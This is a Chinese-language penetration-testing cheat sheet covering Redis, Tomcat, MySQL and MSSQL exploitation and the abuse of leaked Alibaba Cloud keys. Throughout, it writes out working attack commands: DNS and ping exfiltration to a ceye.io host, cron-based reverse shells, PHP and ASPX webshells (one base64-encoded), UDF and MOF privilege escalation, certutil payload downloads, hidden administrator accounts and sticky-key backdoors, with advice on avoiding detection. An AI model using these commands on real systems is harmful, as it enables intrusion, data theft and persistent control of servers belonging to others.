下面这个语句,主要是过滤作用。把helo.txt文件中的“=”过滤并重新输出文件。
```
for /f "delims=^= tokens=1,*" %i in (helo.txt) do (echo %i>>text3.txt)
```
为什么在上面需要过滤=,主要是因为在执行ping命令的时候是不允许带=号的,相较于nslookup,ping命令成功率相对较高,但如果路径过长,可能会导致失败。具体多长需要大家自行试验。
```
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&for /f "delims=^= tokens=1,*" %i in (temp2) do (echo %i>>temp3)&&set /p ADDR=<temp3&ping %ADDR%.is1lv6.ceye.io
```
如果需要外带多行命令,则需要以下语句:
```
where /R C: login.* > test && certutil -encodehex -f test test.hex 4 && powershell $text=Get-Content test.hex;$sub=$text -replace(' ','');$j=11111;foreach($i in $sub){ $fin=$j.tostring()+'.'+$i+'.is1lv6.ceye.io';$j += 1; nslookup $fin }
```
**(b)Linux**
在linux中pwd也是查看当前目录的,我们通过tr -d将换行符去掉并通过xxd -ps将值转化为16进制,这样我们即可外带出自己想要的东西。
```
ping pwd|tr -d '\n'|xxd -ps.is1lv6.ceye.io
```
base64原理和上面类似,主要是对值进行base64编码,然后替换掉“=”,即可成功外带数据。
```
pingpwd|base64|tr -d ‘=’.is1lv6.ceye.io
```
如果有多行数据需要外带,那么请考虑下面的语句。(和大佬学的)
```
var=11111 && for b in $(find / -name "index.php" | xargs grep "111222"|xxd -p); do var=$((var+1)) && dig $var.$b.is1lv6.ceye.io; done
```
oob主要参考一位大佬文章,会在文末列出。
## 未授权漏洞
### redis
参考:https://www.cnblogs.com/twosmi1e/p/13308682.html
https://www.cnblogs.com/loopkep/p/11135949.html
#### **常用命令**
```
set testkey "Hello World" # 设置键testkey的值为字符串Hello World
get testkey # 获取键testkey的内容
SET score 99 # 设置键score的值为99
INCR score # 使用INCR命令将score的值增加1
GET score # 获取键score的内容
keys * # 列出当前数据库中所有的键
get anotherkey # 获取一个不存在的键的值
config set dir /home/test # 设置工作目录,Redis产生的备份文件将放在这个目录下
config set dbfilename redis.rdb # 设置备份文件名
config get dir # 检查工作目录是否设置成功
config get dbfilename # 检查备份文件名是否设置成功
save # 进行一次备份操作
flushall 删除所有数据
del key 删除键为key的数据
```
1. 使用SET和GET命令,可以完成基本的赋值和取值操作;
2. Redis是不区分命令的大小写的,set和SET是同一个意思;
3. 使用keys *可以列出当前数据库中的所有键;
4. 当尝试获取一个不存在的键的值时,Redis会返回空,即(nil);
5. 如果键的值中有空格,需要使用双引号括起来,如"Hello World";
#### **利用**
##### 写ssh-keygen登录
利用条件
1. root账号启动redis服务
2. 服务器开放SSH服务,允许密钥登录。
1. 攻击机上生成公私钥
![img](img/2059787-20200715224555141-1298892077.png)
2. 未授权访问redis
![img](img/2059787-20200715224603427-816508208.png)
3. 利用redis的数据备份功能修改备份目录为 /redis/.ssh/ 备份文件名为 authorized_keys
![img](img/2059787-20200715224612696-1520388092.png)
4. 写入键值
![img](img/2059787-20200715224623093-986828475.png)
5. ssh连接
![img](img/2059787-20200715224628816-465374735.png)
利用二
```
>ssh-keygen -t rsa
>(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > qq.txt
>cat qq.txt | redis-cli -h 127.0.0.1 -x set crackit
>redis-cli -h 127.0.0.1
6379> config set dir /root/.ssh/
6379> config set dbfilename "authorized_keys"
6379> save
```
##### 写计划任务反弹shell
定时任务位置位于文件:/var/spool/cron/用户名
**原理**
/var/spool/cron/目录下存放的为以各个用户命名的计划任务文件,root用户可以修改任意用户的计划任务。dbfilename设置为root为用root用户权限执行计划任务。
**执行命令反弹shell(写计划任务时会覆盖原来存在的用户计划任务).写文件之前先获取dir和dbfilename的值,以便恢复redis配置,将改动降到最低,避免被发现**。
**利用条件**
redis是root用户启动
**坑:crontab反弹debian,ubuntu都不行**,因为他们对计划任务的格式很严格,必须要执行
`crontab -u root /var/spool/cron/crontabs/root`
通过语法检查后,才能执行计划任务。
执行
```
#获取dir的值
config get dir
#获取dbfilename的值
config get dbfilename
#设置数据库备份目录为linux计划任务目录
config set dir '/var/spool/cron/'
#设置备份文件名为root,以root身份执行计划任务
config set dbfilename 'root'
#删除所有数据库的所有key
flushall
#设置写入的内容,在计划任务前后加入换行以确保写入的计划任务可以被正常解析,此处可以直接调用lua语句。
eval "redis.call('set','cron',string.char(10)..ARGV[1]..string.char(10))" 0 '*/1 * * * * bash -i >& /dev/tcp/10.10.19.29/8080 0>&1'
#保存
save
#删除新增的key
del cron
#恢复dir和dbfilename
config set dir '***'
config set dbfilename '***'
```
利用
```
redis 192.168.242.134:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.242.131/888 0>&1\n"
redis 192.168.242.134:6379> config set dir /var/spool/cron/
redis 192.168.242.134:6379> config set dbfilename root
redis 192.168.242.134:6379> save
```
##### 写webshell
利用条件
1. 已知web的绝对路径
2. 具有读写权限
```
redis-cli -h 192.168.1.154
config set dir /var/www/html
set xxx "\n\n\n<?php@eval($_POST['c']);?>\n\n\n"
config set dbfilename webshell.php
save
```
##### 利用主从复制获取shell
利用脚本1
```
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make
git clone https://github.com/Ridter/redis-rce
python redis-rce.py -r 192.168.1.154 -L 192.168.1.153 -f module.so
```
脚本2
```
https://github.com/vulhub/redis-rogue-getshell
需要python3.0以上
编译
>cd RedisModulesSDK/
>make
会在此目录下生成exp.so
执行命令
>python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
https://github.com/n0b0dyCN/redis-rogue-server
需要python3.6以上
编译
>cd RedisModulesSDK/exp
>make
执行
>./redis-rogue-server.py --rhost 192.168.0.120 --lhost 192.168.0.108
```
相关利用工具
https://github.com/00theway/redis_exp
https://github.com/r35tart/RedisWriteFile
##### 其他姿势
Windows下如何getshell?
- 写入webshell,需要知道web路径
- 写入启动项,需要目标服务器重启
- 系统dll劫持
- 覆盖软件或者中间件配置文件
- 覆盖快捷方式
- 覆盖粘滞键,放大镜
- 写入MOF,MOF每隔5秒钟会自动执行一次,适用于Windows2003。
实战在生产环境下用还是会有很多问题的
1. redis数据量稍微大一点,写shell到文件之后,php因为文件太大是会拒绝执行的
2. Ubuntu,Debian写计划任务反弹无用
3. 写/etc/passwd会覆盖原有/etc/passwd,不可能改了再改回来
4. 生产环境下用`KEY *` 这样的命令直接炸
## 敏感信息泄漏利用
### 阿里云Access Key利用
首先用行云管家导入云主机,网站地址:https://yun.cloudbility.com/
步骤:选择阿里云主机 -> 导入key id跟key secret -> 选择主机 -> 导入即可(名字随便输)
我们用这个只是为了得到两个数据,就是**实例ID以及所属网络**,拿到就可以走人了.
这里我们打开阿里API管理器,这个是阿里提供给运维开发人员使用的一个工具,
https://api.aliyun.com/#/?product=Ecs
点击左边的搜素框输入command,我们会用到CreateCommand跟InvokeCommand,CreateCommand是创建命令,InvokeCommand是调用命令。继续往下看
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribSc1yXehrLAgMEv9p7DyEFfuSru0zW7YlA50JjAtIEibWVHYEGo0qtJVnQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
Name部分随意
Type指的是执行脚本类型
RunBatScript:创建一个在Windows实例中运行的 Bat 脚本。
RunPowerShellScript:创建一个在Windows实例中运行的PowerShell脚本。
RunShellScript:创建一个在Linux实例中运行的Shell脚本。
CommandContent为执行命令,需要注意的是这里是填写base64编码。
填写完后选择python
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScFLYCmT0CO5KSxJSZNa8LJATJc0jC4cRkPHjuCoUr4pDUib44HRQUDUA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
点击**调试SDK示例代码**,此时会弹出Cloud shell窗口,并创建一个CreateCommand.py文件,用vim编辑器打开CreateCommand.py,修改accessKeyId与accessSecret。
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScqAeuZ8UumNuZqwSyLhMkWBibHpQbEINQKYY7yHqNYOMFyqrlnmTgu9Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScoM4GVJbBWJJfaJTNgHFNuEqZSgkrdicOwr5HRxBkwo2ffNNXM2LLKoQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
执行CreateCommand.py,会返回一个RequestId与CommandId,记录CommandId,后面调用命令会用到。
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScBE7czOcxicKZuXHIpRicVgicRAibTmDK5oGhjZTXQtqibV3iatJjDGWPD2mQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
打开InvokeCommand
RegionId填写行云管家中的所属网络
CommandId填写刚刚执行CreateCommand.py返回的CommandId
InstanceId填写示例ID,行云管家中获取到的那个
继续点击**调试SDK代码**,会生成一个InvokeCommand.py文件,同样用vim编辑器把accessKeyId与accessSecret修改了。
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScfCqYTQiaFqlLrnG8ntYaecWnZZwBJqDLHeC7cBHopSxFdhibqObyVhdw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
修改完成后使用nc监听端口,执行InvokeCommand.py。
![img](https://mmbiz.qpic.cn/mmbiz_png/gqALwUU9cicxI5hGqt5EdOUibOTj95ribScWV8vIzqkd7OGnQH4xszFoHurKCiagO5vGxQLMeq2jBA6KMeaFBWseJg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
成功执行命令反弹shell,收工。
#### alicloud利用工具
https://github.com/iiiusky/alicloud-tools
## 中间件安全
### tomcat安全
参考:https://www.anquanke.com/post/id/223002 不安全的中间件——Tomcat
**自带的默认应用**
1. examples目录
1. 信息泄漏
2. /examples/servlets/servlet/SessionExample 允许用户对session进行操纵(老系统可能出现)
2. admin管理页面
1. Tomcat 5.0.4版本之前都是默认安装,.5.0.4之后版本默认存在该目录,但是功能并不全
1. 默认路径为/admin
2. tomcat-user.xml文件中进行账号密码的配置
3. 功能和manager下面的差不多
2. manager管理页面
1. 最常见的,基本tomcat默认都有
2. 默认没有设置登录口令,需要tomcat-user.xml文件中进行账号密码的配置
3. 登录使用的Basic认证方式(请求头里面的Authorization为base64编码,可以用burp爆破)
4. Tomcat manager包含4个不同的角色:
- manager-gui:允许访问html页面接口(即URL路径为/manager/html/*)
- manager-script:允许访问纯文本接口(即URL路径为/manager/text/*)
- manager-jmx:允许访问JMX代理接口(即URL路径为/manager/jmxproxy/*)
- manager-status:允许访问Tomcat只读状态页面(即URL路径为/manager/status/*)
5. 部署war包拿shell
3. AJP协议
1. 比较鸡肋
2. 目前爆出的可直接利用的就是CVE-2020-1938(AJP文件包含漏洞)
4. debug模式
1. 默认不开启
2. 调试端口8000,指纹jdwp
3. 低版本的jdk中会存在漏洞,可以通过jdwp来执行系统命令
5. CVE-2016-8735反序列化
1. 条件:配置JMX做监控时使用了JmxRemoteLifecycleListener
2. ysoserial来进行漏洞攻击利用
6. CVE-2017-12615 & CVE-2017-12616 put文件上传
1. 范围7.0.0 – 7.0.79
2. 条件:手动将web.xml中的readonly设置为false
3. 利用构造put上传shell,返回201为成功
7. CVE-2019-0232命令注入
1. 该漏洞的利用条件较为苛刻,需同时满足下列条件:
1. 系统为Windows
2. 启用了CGI Servlet(默认为关闭)
3. 启用了enableCmdLineArguments(Tomcat 9.0.*及官方未来发布版本默认为关闭)
影响范围:
```
9.0.0.M1-9.0.17
8.5.0-8.5.39
7.0.0-7.0.93
```
8. CVE-2020-1938 AJP缺陷
1. 文件读取,代码执行
2. 范围
```
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
```
## 数据库安全
### mysql渗透总结
#### 一、sqlshell获取
要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。
1、弱口令
这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也写过一个。要是运气好的话直接跑到弱口令就直接进去,当然也可以配合社工字典来跑这样成功率更高。
2、文件读取漏洞
需要挖一个任意文件读取漏洞,然后利用读网站的配置文件,里面存放着数据库账号密码。
3、信息泄露
扫目录扫网站备份文件,或者git泄露
4、sql注入
这个不用多说,要是权限够大直接sqlmap os-shell一把梭
5、身份认证绕过漏洞(CVE-2012-2122)
受影响版本:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
在msf里面有模块,可以直接用auxiliary/scanner/mysql/mysql_authbypass_hashdump来跑
当数据库不能外连可以通过以下方法开放外连(注意防火墙):
可以修改`host`为`%`并刷新权限后,默认root等账号不允许远程连接
```
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES ;
select host, user from user;
```
#### 二、mysql拿shell
##### 1、用命令直接导出shell
原理:利用导出命令来导出shell。
条件:
1. 需要知道网站的物理路径(绝对路径)
通过程序报错,日志泄露,phpinfo,php探针等方式可以获取到物理路径。
2.允许导出
先查看是否允许导入导出
```
show variables like '%secure%'
```
secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹,就会报告如下错误:
```
RROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
如果条件都满足的话,就可以开始了
outfile
```
select '<?php eval($_POST[xxx]) ?>' into outfile '/var/www/xx.php';
```
dumpfile
```
select '<?php eval($_POST[xx]) ?>' into dumpfile '/var/www/xx.php';
```
注意:outfile函数可以导出多行,而dumpfile只能导出一行数据outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式
借助表导出。
```
Drop TABLE IF EXISTS temp;
Create TABLE temp(cmd text NOT NULL);
Insert INTO temp (cmd) VALUES('<?php eval($_POST[xxx]) ?>');
Select cmd from temp into out file '/var/www/xx.php';
Drop TABLE IF EXISTS temp;
```
也可以用mysql 的 -e 参数
```
mysql -u user -p passwd -e "select '' into outfile '/var/www/xxx.php'"
```
##### 2、利用general_log拿shell
如果导入导出被禁用了就可以用这个方法试试。
原理:利用修改日志文件路径,往日志文件写入一句话。
条件:
1.对应web目录有写权限
2.需要有物理路径
3.如果拿到的是注入,还需要能执行堆叠注入
4.root用户,或者有对应权限的用户
利用如下:开启日志,更改路径,把一句话写入日志文件。
```
set global general_log=on;
set global general_log_file='/var/www/1.php';
select '<?php eval($_POST[safe6]) ?>';
```
**3.写加密马**
把冰蝎,哥斯拉的马儿进行base64编码,然后写一个普通的abb.php就访问abb.php会在当前路径生成abab.php
```
select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0lPTlsmIzM5O2smIzM5O109JGtleTsNCgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgmIzM5O29wZW5zc2wmIzM5OykpDQoJew0KCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7DQoJCSRwb3N0PSR0KCRwb3N0LiIiKTsNCgkJDQoJCWZvcigkaT0wOyRpJmx0O3N0cmxlbigkcG9zdCk7JGkrKykgew0KICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgDQogICAgCQkJfQ0KCX0NCgllbHNlDQoJew0KCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsNCgl9DQogICAgJGFycj1leHBsb2RlKCYjMzk7fCYjMzk7LCRwb3N0KTsNCiAgICAkZnVuYz0kYXJyWzBdOw0KICAgICRwYXJhbXM9JGFyclsxXTsNCgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319DQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7DQo/Jmd0Ow0K"));?>' into outfile 'C:/wamp/www/abb.php';
```
#### 三、任意文件读取
既然有文件导出,肯定也有文件导入。关于任意文件读取怎么用,我之前总结过。
条件:和导出shell的条件一样。
利用:先创建一张表,读取文件内容到表。
```
create table a (v text);
load data infile 'file_name' into table table_name fields terminated by '分隔符'
```
例如读text.txt:
```
load data infile 'C:/phpstudy/MySQL/test.txt' into table a fields terminated by ',';
```
查看内容
```
SELECT * FROM a
```
#### 四、mysql提权
先推荐一个小工具https://github.com/T3st0r-Git/HackMySQL
**1、mof提权**
原理:
利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。
条件:
1、mof提权的前提是root用户
2、可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下
利用:
网上工具也很多,可以直接用msf的exploit/windows/mysql/mysql_mof模块,执行成功后会直接反弹meterpreter。
**2、udf提权**
原理:
UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。
条件:
1、系统是Windows(Win2000,XP,Win2003);有一个mysql数据库的账户拥有insert和delete权限,以创建和抛弃函数。
2、Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
3、Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\
system32。
4、拥有相应目录的写权限
注意:一般Lib、Plugin文件夹需要手工建立(也可用NTFS ADS流模式突破进而创建文件夹)
```
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\\ProgramFiles\\\MySQL\\\MySQL Server 5.1\\\lib::$INDEX\_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\\ProgramFiles\\\MySQL\\\MySQL Server 5.1\\\lib\\\plugin::$INDEX\_ALLOCATION'; //利用NTFS ADS创建plugin目录
```
利用:
直接用msf的use exploit/multi/mysql/mysql_udf_payload模块.
msf会将dll文件写入lib\plugin\目录下(前提是该目录存在,如果该目录不存在的话,则无法执行成功),dll文件名为**随机生成**的名字(记下来后面手动创建需要用到)。该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。
手动创建sys_eval()
```
create function sys_eval returns string soname 'SGJECYG.dll';
```
执行手动创建的函数
```
select sys_eval('whoami');
```
检查有没有创建成功
```
select * from mysql.func where name = 'sys_eval';
```
删除函数
```
drop function sys_eval;
```
**3、启动项提权**
原理:本质还是用导出命令来实现,导出脚本到启动目录,服务器重启就执行脚本。
条件:上面说过了。
利用:
写个vbs到启动目录,想办法让服务器重启。
```
1,开始菜单当前用户启动文件夹--C:\\Users\\用户名\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
2,开始菜单所有用户启动文件夹--C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp
3,注册表当前用户开机启动项目录--HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
4,注册表所有用户开机启动项目录--HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
```
写脚本
```
create table a (cmd text);//创建表
insert into a values ("set wshshell=createobject(""wscript.shell"") " );//写数据到表
insert into a values ("a=wshshell.run(""cmd.exe /c net user aabbcc 123456 /add"",0) " );
insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators aabbcc/add"",0) " );
select * from a into outfile "C:\\\Documents andSettings\\\All Users\\\「开始」菜单\\\程序\\\启动\\\a.vbs";//导出vbs
```
msf下也有对应模块exploit/windows/mysql/mysql_start_up
#### 五、拓展
其他常用msf模块
exploit/windows/mysql/scrutinizer_upload_exec(上传文件执行)
auxiliary/scanner/mysql/mysql_hashdump(mysql的mysql.user表的hash)
auxiliary/admin/mysql/mysql_sql(执行sql语句,navicat更香)
auxiliary/scanner/mysql/mysql_version(识别版本)
#### 六、参考
https://xz.aliyun.com/t/3973
https://xz.aliyun.com/t/1491
https://blog.csdn.net/qq_37077262/article/details/102964050
http://www.safe6.cn/article/108
https://blog.csdn.net/qq_36119192/article/details/84863268
https://www.freebuf.com/articles/system/163144.html
### mssql渗透总结
膜拜大佬文章https://y4er.com/post/mssql-getshel
#### getshell
能否getshell要看你当前的用户权限,如果是没有进行降权的sa用户,那么你几乎可以做任何事。当然你如果有其他具有do_owner权限的用户也可以。
拿shell的两大前提就是
1. 有相应的权限db_owner
2. 知道web目录的绝对路径
我们先来了解下怎么去寻找web目录的绝对路径。
##### 寻找绝对路径
1. 报错信息
2. 字典猜
3. 旁站的目录
4. 存储过程来搜索
5. 读配置文件
前三种方法都是比较常见的方法。我们主要来讲第四种调用存储过程来搜索。
在mssql中有两个存储过程可以帮我们来找绝对路径:`xp_cmdshell xp_dirtree`
先来看`xp_dirtree`直接举例子
```mssql
execute master..xp_dirtree 'c:' --列出所有c:\文件、目录、子目录
execute master..xp_dirtree 'c:',1 --只列c:\目录
execute master..xp_dirtree 'c:',1,1 --列c:\目录、文件
```
当实际利用的时候我们可以创建一个临时表把存储过程查询到的路径插入到临时表中
```mssql
CREATE TABLE tmp (dir varchar(8000),num int,num1 int);
insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1;
```
我们再来看`xp_cmdshell`怎么去找绝对路径,实际上原理就是调用cmd来查找文件,相对来说这种方法更方便。
当然你可能遇到xp_cmdshell不能调用 如果报错
> SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用。
可以用如下命令恢复
```
;EXEC sp_configure 'show advanced options',1;//允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展
RECONFIGURE;--
```
当然还不行可能xplog70.dll需要恢复,看具体情况来解决吧
接下来我们先来看cmd中怎么查找文件。
```
C:\Users\Y4er>for /r e:\ %i in (1*.php) do @echo %i
e:\code\php\1.php
C:\Users\Y4er>
```
那么我们只需要建立一个表 存在一个char字段就可以了
```mssql
http://192.168.130.137/1.aspx?id=1;CREATE TABLE cmdtmp (dir varchar(8000));
http://192.168.130.137/1.aspx?id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i'
```
然后通过注入去查询该表就可以了。
------
此时我们拿到绝对路径之后,我们接着往下看怎么拿shell
##### xp_cmdshell拿shell
xp_cmdshell这个存储过程可以用来执行cmd命令,那么我们可以通过cmd的echo命令来写入shell,当然前提是你知道web目录的绝对路径
```mssql
http://192.168.130.137/1.aspx?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\404.aspx' ;
```
由于cmd写webshell的主意这些转义的问题 推荐使用certutil或者vbs什么的来下载
##### 差异备份拿shell
```mssql
1. backup database 库名 to disk = 'c:\bak.bak';--
2. create table [dbo].[test] ([cmd] [image]);
3. insert into test(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
4. backup database 库名 to disk='C:\d.asp' WITH DIFFERENTIAL,FORMAT;--
```
因为权限的问题,最好不要备份到盘符根目录
当过滤了特殊的字符比如单引号,或者 路径符号 都可以使用定义局部变量来执行。
##### log备份拿shell
LOG备份的要求是他的数据库备份过,而且选择恢复模式得是完整模式,至少在2008上是这样的,但是使用log备份文件会小的多,当然如果你的权限够高可以设置他的恢复模式
```mssql
1. alter database 库名 set RECOVERY FULL
2. create table cmd (a image)
3. backup log 库名 to disk = 'c:\xxx' with init
4. insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)
5. backup log 库名 to disk = 'c:\xxx\2.asp'
```
log备份的好处就是备份出来的webshell的文件大小非常的小
#### getsystem
我们继续来探究怎么进行提权
##### xp_cmdshell
在2005中xp_cmdshell的权限是system,2008中是network。
当遇到无法写shell,或者是站库分离的时候,直接通过xp_cmdshell来下载我们的payload来上线会更加方便。下载文件通常有下面几种姿势
1. certutil
2. vbs
3. bitsadmin
4. powershell
5. ftp
这个我会放在下一篇文章中细讲。
通过下载文件之后用xp_cmdshell来执行我们的payload,通过Cobalt Strike来进行下一步操作,比如怼exp或许会更加方便。
##### sp_oacreate
当xp_cmdshell 被删除可以使用这个来提权试试,恢复sp_oacreate
```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
```
sp_oacreate是一个非常危险的存储过程可以删除、复制、移动文件 还能配合sp_oamethod 来写文件执行cmd
在以前的系统有这几种用法
1. 调用cmd 来执行命令
```
wscript.shell执行命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c xxx'
Shell.Application执行命令
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','','1';
```
1. 写入启动项
```
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
```
1. 粘贴键替换
```
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
```
大家可以灵活运用,这里也可以这样玩,把他写成vbs或者其他的来下载文件 ,为什么不直接调用cmd来下载,再2008系统上我是不成功的,但是sp_oacreate可以启动这个文件,所以换个思路
```
declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out;
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'c:\www\1.bat', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'@echo off';
exec @ret = sp_oamethod @f, 'writeline', NULL,'start cmd /k "cd c:\www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"';
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\www\1.bat'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\www\file.exe'
```
当然这里只是一种思路,你完全可以用vbs来下载什么的
##### 沙盒提权
```mssql
1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
3. Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');
```
引用前辈们的话
> 1,Access可以调用VBS的函数,以System权限执行任意命令
> 2,Access执行这个命令是有条件的,需要一个开关被打开
> 3,这个开关在注册表里
> 4,SA是有权限写注册表的
> 5,用SA写注册表的权限打开那个开关
> 6,调用Access里的执行命令方法,以system权限执行任意命令执行SQL命令,执行了以下命令
##### xp_regwrite
修改注册表 来劫持粘贴键 当然在2008数据库是不成立的 因为默认权限很低
```
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
```
